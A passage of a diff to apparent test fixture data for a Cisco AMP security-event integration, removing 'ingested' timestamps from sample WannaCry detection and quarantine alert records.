Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526292\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -1340,7 +1324,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212727583Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526291\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -1416,7 +1399,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212728534Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526288\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -1492,7 +1474,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212729403Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526287\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -1568,7 +1549,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212730217Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526286\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -1644,7 +1624,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212731029Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558988\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -1720,7 +1699,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212732112Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558989\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -1796,7 +1774,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212732942Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558987\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -1872,7 +1849,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212733859Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558986\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -1948,7 +1924,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212734676Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558985\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -2024,7 +1999,6 @@ ], "code": "2164260880", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212735537Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -2102,7 +2076,6 @@ ], "code": "1090519054", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212736406Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":461000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "severity": 2 @@ -2199,7 +2172,6 @@ ], "code": "1090519054", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212737316Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":430000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "severity": 2 @@ -2296,7 +2268,6 @@ ], "code": "1090519054", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212738148Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":327000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "severity": 2 @@ -2397,7 +2368,6 @@ ], "code": "1090519054", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212738960Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":313000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "severity": 2 @@ -2492,7 +2462,6 @@ ], "code": "553648143", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212739795Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "severity": 2 @@ -2564,7 +2533,6 @@ ], "code": "553648143", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212740666Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "severity": 2 @@ -2636,7 +2604,6 @@ ], "code": "553648143", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212741591Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}", "severity": 2 @@ -2708,7 +2675,6 @@ ], "code": "553648143", "id": "6419303574240494000", - "ingested": "2022-02-02T05:52:43.212742400Z", "kind": "alert", "original": 